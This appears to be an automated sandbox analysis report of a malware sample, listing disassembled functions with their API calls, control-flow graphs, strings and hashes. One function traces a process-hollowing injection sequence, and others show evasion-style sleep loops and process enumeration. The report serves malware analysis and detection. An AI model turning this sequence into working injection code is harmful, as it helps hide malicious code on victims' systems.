                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 409 b31d34-b31dbf call b34be0 call b34e6c call b35224 CreateMutexExA 418 b31dc1-b31dce 409->418 419 b31dd6-b31e27 call b35308 call b35280 call b34d50 call b351cc call b35224 call b31ea4 409->419 418->419 433 b31e33-b31e5b CreateFileMappingA 419->433 434 b31e29 419->434 435 b31e61-b31e64 call b3223c 433->435 434->433 437 b31e69-b31e6b 435->437 437->435 438 b31e6d-b31e74 437->438 439 b31e87 438->439 440 b31e76-b31e7d 438->440 441 b31e8c-b31e9a 439->441 440->439 442 b31e7f-b31e82 call b32cac 440->442 445 b31e9c 441->445 442->439 445->435
                                                                                          APIs
                                                                                            • Part of subcall function 00B34BE0: GetVolumeInformationA.KERNEL32 ref: 00B34C4D
                                                                                          • CreateMutexExA.KERNEL32 ref: 00B31DA7
                                                                                          • CreateFileMappingA.KERNEL32 ref: 00B31E54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$FileInformationMappingMutexVolume
                                                                                          • String ID:
                                                                                          • API String ID: 3260430491-0
                                                                                          • Opcode ID: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
                                                                                          • Instruction ID: ae8df5747253b61c14132dcb20372a6ba725714757d7983c6e3a857b6b817548
                                                                                          • Opcode Fuzzy Hash: 97bb87496fde6e4db97111b52ca229a5d1b0978d98986e1021884b3d981a9ef1
                                                                                          • Instruction Fuzzy Hash: FE319F30704F584FCB65EB39C0083AFB6D2EB99305F644CAE949FD6242CF75A9068786
                                                                                          Function 083F49A0 Relevance: 3.1, APIs: 2, Instructions: 81COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetTokenInformation.KERNELBASE ref: 083F49EC
                                                                                          • GetTokenInformation.KERNELBASE ref: 083F4A1C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationToken
                                                                                          • String ID:
                                                                                          • API String ID: 4114910276-0
                                                                                          • Opcode ID: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
                                                                                          • Instruction ID: fdfba84e097cde11cd09faa5a54a0d180cf42c4e6d99b361b45eb7fe384691fd
                                                                                          • Opcode Fuzzy Hash: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
                                                                                          • Instruction Fuzzy Hash: 8B215434208A488FC754EF2CD4885AAB7F1FFD9311B004A5EE59BC7264CB70E945CB81
                                                                                          Function 00B349A0 Relevance: 3.1, APIs: 2, Instructions: 81COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 483 b349a0-b349cb 485 b34a53-b34a64 483->485 486 b349d1-b34a23 GetTokenInformation call b35280 GetTokenInformation 483->486 489 b34a2b-b34a49 call b35224 486->489 489->485
                                                                                          APIs
                                                                                          • GetTokenInformation.KERNELBASE ref: 00B349EC
                                                                                          • GetTokenInformation.KERNELBASE ref: 00B34A1C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationToken
                                                                                          • String ID:
                                                                                          • API String ID: 4114910276-0
                                                                                          • Opcode ID: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
                                                                                          • Instruction ID: 4eeeb92ee6c7df9486f3f78999d0118a594d906e5ed02d834fcc37043e901592
                                                                                          • Opcode Fuzzy Hash: 652aecce9067a30358b91952564671c85239d7f531018ec1d7311adbfa28af3f
                                                                                          • Instruction Fuzzy Hash: 60214234208A488FC754EF2CD4885AAB7F1FFD9311B104A5EE49AC7264CB70E945CB81
                                                                                          Function 083F3CA4 Relevance: 3.1, APIs: 2, Instructions: 72processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 503 83f3ca4-83f3cbb 504 83f3d5b-83f3d74 503->504 505 83f3cc1-83f3cd3 CreateToolhelp32Snapshot 503->505 506 83f3cd5-83f3ceb 505->506 507 83f3d43-83f3d55 SleepEx 505->507 509 83f3d36-83f3d38 506->509 507->504 507->505 510 83f3ced-83f3d04 call 83f5000 509->510 511 83f3d3a-83f3d3b 509->511 514 83f3d06-83f3d08 510->514 511->507 515 83f3d1c-83f3d23 call 83f4678 514->515 516 83f3d0a-83f3d18 514->516 519 83f3d28-83f3d2e 515->519 516->514 517 83f3d1a 516->517 517->519 519->509
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateSleepSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 684154974-0
                                                                                          • Opcode ID: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction ID: d8076cdb06b273cc18617e377d133c7e9d2afa23d746025f0ee6c3f32b21c09e
                                                                                          • Opcode Fuzzy Hash: 1adf98eb8c503d42aecd34c6b39fce325a4a04e32c54699d588d18b6d36bf1ef
                                                                                          • Instruction Fuzzy Hash: 8C11E430218A498FEB14EB24C4887BB76D2FBC8316F184A7DE54BDA796DAB484418791
                                                                                          Function 083F3D80 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 523 83f3d80-83f3d90 524 83f3db6-83f3dc4 523->524 525 83f3d92-83f3db4 EnumWindows SleepEx 523->525 525->524 525->525
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumSleepWindows
                                                                                          • String ID:
                                                                                          • API String ID: 498413330-0
                                                                                          • Opcode ID: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
                                                                                          • Instruction ID: 9537924dfc1aa30db200a7812de4b53930b9bc745e58414783d7353919c595c5
                                                                                          • Opcode Fuzzy Hash: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
                                                                                          • Instruction Fuzzy Hash: F2E04F30A086898FEB18DBB4C4CC7F23691DB59206F5808B9DD4ADD797C6A65485C351
                                                                                          Function 00B33D80 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 520 b33d80-b33d90 521 b33d92-b33db4 EnumWindows SleepEx 520->521 522 b33db6-b33dc4 520->522 521->521 521->522
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumSleepWindows
                                                                                          • String ID:
                                                                                          • API String ID: 498413330-0
                                                                                          • Opcode ID: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
                                                                                          • Instruction ID: 46617dcbb670727d831bb0b44e6a05e050d1872092174fc5f5ec85fd5dc5ec6e
                                                                                          • Opcode Fuzzy Hash: f3c7586747357b588c35315657a812ba148d3fa2d02c4e479e86db6dcc9cbd3e
                                                                                          • Instruction Fuzzy Hash: 8AE08630A086894FEF58DBB4C4CC7F236D1DB19305F6808B9DC4BDD696CAAA5984C311
                                                                                          Function 00B34008 Relevance: 1.9, APIs: 1, Instructions: 447COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f808b6709be1d712b9c517ecd9c93eda4043063f06578d6a062a0bf28ad2d93
                                                                                          • Instruction ID: 78e01c19c92f0324933895acf85591668ec8a34fb55f56ff135d37a747880e25
                                                                                          • Opcode Fuzzy Hash: 5f808b6709be1d712b9c517ecd9c93eda4043063f06578d6a062a0bf28ad2d93
                                                                                          • Instruction Fuzzy Hash: 81D17130718F088FDB58EF68D8456AEB7E2FB98701F20456DE44AC3251DF74E9468B86
                                                                                          Function 083F368C Relevance: 1.9, APIs: 1, Instructions: 404comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction ID: 9f813762a3f43d80c03713fdc56a230f1d8da384380636874bddc15ee0f71b79
                                                                                          • Opcode Fuzzy Hash: 2208a6a82576e187932f5e6c94c4aea895329bbb5408a92f633c0b1253718546
                                                                                          • Instruction Fuzzy Hash: 1FE1EA34608A48CFCF94EF28C885E99B7F1FFA9305F114699E44ACB265DB30E945CB81
                                                                                          Function 083F1EA4 Relevance: 1.7, APIs: 1, Instructions: 170fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction ID: ebd038aea36ea9aee5b860032c3daa209c8c24b27949382c6bef43b53943d19c
                                                                                          • Opcode Fuzzy Hash: 8d1e4db704517eea09dd1d3d297329f0e9ff07853cce15996669b6bd33a65373
                                                                                          • Instruction Fuzzy Hash: CF410434718A5C4FDBA8FF6894187AA72D2EBD8202F50417E990EC7396DE388D468785
                                                                                          Function 083F3394 Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction ID: a5ff2a3f08e262908b2e45662a049a8f76ed8818252325c411f1797981d20f3a
                                                                                          • Opcode Fuzzy Hash: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction Fuzzy Hash: 94419530718E1D1FD79CEA6C98583BAB6D1EBC9252F14063EA59FC3352DE24985347C1
                                                                                          Function 00B33394 Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction ID: 7b122f18f2e9a429202e3b7c4a44f65c7d5de73880db74997b4102657db2b4e7
                                                                                          • Opcode Fuzzy Hash: bce1ea647a0ad53f7809f43b4b76498aa7ec4cacb6875e2a025e8a9db3f2ac28
                                                                                          • Instruction Fuzzy Hash: 9E41B530718E1D1FD75CEB6C98593BAB6C1EBC9711F24066EA4AFC3352DE24A9424781
                                                                                          Function 083F4D50 Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction ID: de7883e31ded536891b67c1f0413d05ed851cf8bc92fa472119b6f761af92119
                                                                                          • Opcode Fuzzy Hash: 997ac8fe02efc5f307ac4cae89ba3b52f0d6671010cb042dd0c96d2438d46594
                                                                                          • Instruction Fuzzy Hash: F031B935608A4C8FDB18FF68D8895EA77D5FBD8315B00027EE94EC7246EE7098468BD1
                                                                                          Function 083F4BE0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVolumeInformationA.KERNEL32 ref: 083F4C4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2039140958-0
                                                                                          • Opcode ID: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction ID: 248e5515f2c4305cdbba15a658b20cdcfe8c5f693fe83b5a4d11b2d4e6bb18ef
                                                                                          • Opcode Fuzzy Hash: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction Fuzzy Hash: B3314430614A4C4FD7A4EF68C4486AA77E1FBE8311F10466E994EC7265DE30DA45CBC1
                                                                                          Function 00B34BE0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVolumeInformationA.KERNEL32 ref: 00B34C4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationVolume
                                                                                          • String ID:
                                                                                          • API String ID: 2039140958-0
                                                                                          • Opcode ID: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction ID: 8a05fc17fd67c3ec13b2cf68764c5d5bf4892e5f303f2d929f4411c9ac030fb5
                                                                                          • Opcode Fuzzy Hash: 849063828afd568fceaff528b4835c67d3789973111070d710bf79c2b37fb4e8
                                                                                          • Instruction Fuzzy Hash: E1315530614A4C4FD7A4EF68C8486EA77E1FBA8311F10466EA94EC7265DE34DA45CBC1
                                                                                          Function 083F1950 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 083F19A0: RtlCreateHeap.NTDLL ref: 083F1ABB
                                                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,?,083F1943), ref: 083F1970
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_83f1000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeapSleep
                                                                                          • String ID:
                                                                                          • API String ID: 221814145-0
                                                                                          • Opcode ID: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction ID: c5265eccdb239897794cd5803c613effba008c2e398e9f38b80d05fecf7ab399
                                                                                          • Opcode Fuzzy Hash: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction Fuzzy Hash: E8E0D820714B088BDB95BB69E0C433D7190DBC8151F84097D670AC7383D8258C8183D1
                                                                                          Function 00B31950 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00B319A0: RtlCreateHeap.NTDLL ref: 00B31ABB
                                                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,?,00B31943), ref: 00B31970
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Offset: 00B31000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b31000_explorer.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeapSleep
                                                                                          • String ID:
                                                                                          • API String ID: 221814145-0
                                                                                          • Opcode ID: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction ID: a8734810817dcbac364daae1de841864cecce7715de35f83851b70264108f38c
                                                                                          • Opcode Fuzzy Hash: 27439b667a4ceb6ac9e8a4e5b9f5677b2aaa942c4ffff63dd0c687c138e059ef
                                                                                          • Instruction Fuzzy Hash: 34E04F20714F081BDB98BB6CD4D532C72D5DB89350FA40EF9B94AD7296D9298C868312

                                                                                          Execution Graph

                                                                                          Execution Coverage:37.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:39
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 575 860000 578 860630 575->578 577 860005 579 86064c 578->579 581 861577 579->581 584 8605b0 581->584 587 8605dc 584->587 585 8605e2 GetFileAttributesA 585->587 586 86061e 587->585 587->586 589 860420 587->589 590 8604f3 589->590 591 8604ff CreateWindowExA 590->591 592 8604fa 590->592 591->592 593 860540 PostMessageA 591->593 592->587 594 86055f 593->594 594->592 596 860110 VirtualAlloc GetModuleFileNameA 594->596 597 860414 596->597 598 86017d CreateProcessA 596->598 597->594 598->597 600 86025f VirtualFree VirtualAlloc Wow64GetThreadContext 598->600 600->597 601 8602a9 ReadProcessMemory 600->601 602 8602e5 VirtualAllocEx NtWriteVirtualMemory 601->602 603 8602d5 NtUnmapViewOfSection 601->603 606 86033b 602->606 603->602 604 860350 NtWriteVirtualMemory 604->606 605 86039d WriteProcessMemory Wow64SetThreadContext ResumeThread 607 8603fb ExitProcess 605->607 606->604 606->605 609 991c90 612 991ca0 609->612 613 991caf 612->613 616 992440 613->616 617 99245b 616->617 618 992464 CreateToolhelp32Snapshot 617->618 619 992480 Module32First 617->619 618->617 618->619 620 99248f 619->620 622 991c9f 619->622 623 9920ff 620->623 624 99212a 623->624 625 99213b VirtualAlloc 624->625 626 992173 624->626 625->626 626->626

                                                                                          Executed Functions

                                                                                          Function 00860110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00860156
                                                                                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0086016C
                                                                                          • CreateProcessA.KERNELBASE(?,00000000), ref: 00860255
                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00860270
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00860283
                                                                                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0086029F
                                                                                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008602C8
                                                                                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008602E3
                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00860304
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0086032A
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00860399
                                                                                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008603BF
                                                                                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 008603E1
                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 008603ED
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00860412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 93872480-0
                                                                                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction ID: 48f36803586bf9cc5d893b2daec4c6c12b4842be52f978c8cfee5cd863e779dc
                                                                                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction Fuzzy Hash: 08B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E509AB391D771AE41CF94
                                                                                          Function 00860420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15 860420-8604f8 17 8604ff-86053c CreateWindowExA 15->17 18 8604fa 15->18 20 860540-860558 PostMessageA 17->20 21 86053e 17->21 19 8605aa-8605ad 18->19 22 86055f-860563 20->22 21->19 22->19 23 860565-860579 22->23 23->19 25 86057b-860582 23->25 26 860584-860588 25->26 27 8605a8 25->27 26->27 28 86058a-860591 26->28 27->22 28->27 29 860593-860597 call 860110 28->29 31 86059c-8605a5 29->31 31->27
                                                                                          APIs
                                                                                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00860533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                          • API String ID: 716092398-2341455598
                                                                                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction ID: 98a3d3d7ae511a9b9ea567fc181acbd6f8e85e4971bd31f107135bfb9894c274
                                                                                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction Fuzzy Hash: 95511870D08388DAEB11CBE8C849BDEBFB2AF11708F144058D5457F286C7BA5A58CB66
                                                                                          Function 008605B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 32 8605b0-8605d5 33 8605dc-8605e0 32->33 34 8605e2-8605f5 GetFileAttributesA 33->34 35 86061e-860621 33->35 36 8605f7-8605fe 34->36 37 860613-86061c 34->37 36->37 38 860600-86060b call 860420 36->38 37->33 40 860610 38->40 40->37
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008605EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813374508.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_860000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID: apfHQ$o
                                                                                          • API String ID: 3188754299-2999369273
                                                                                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction ID: 1b7e1c9c7098a92935539fc288257bcc305fc722126d1b7a73094522391a105b
                                                                                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction Fuzzy Hash: 35011A70C0424CEADB10DBE8C5183AEBFB5AF51309F1480D9C4096B242D7B69B98CBA6
                                                                                          Function 00992440 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 41 992440-992459 42 99245b-99245d 41->42 43 99245f 42->43 44 992464-992470 CreateToolhelp32Snapshot 42->44 43->44 45 992480-99248d Module32First 44->45 46 992472-992478 44->46 47 99248f-992490 call 9920ff 45->47 48 992496-99249e 45->48 46->45 51 99247a-99247e 46->51 52 992495 47->52 51->42 51->45 52->48
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00992468
                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00992488
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0098C000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_98c000_hdeufvw.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3833638111-0
                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction ID: 866812dd9ab3191d4a851ba4d82b0d85acede9c45be7c37b520928bed63552bd
                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction Fuzzy Hash: A5F090366007117FEB303BFDA88DBAE77ECAF49765F100528E646910D0DB70EC458A61
                                                                                          Function 009920FF Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 54 9920ff-992139 call 992412 57 99213b-99216e VirtualAlloc call 99218c 54->57 58 992187 54->58 60 992173-992185 57->60 58->58 60->58
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00992150
                                                                                          Memory Dump Source
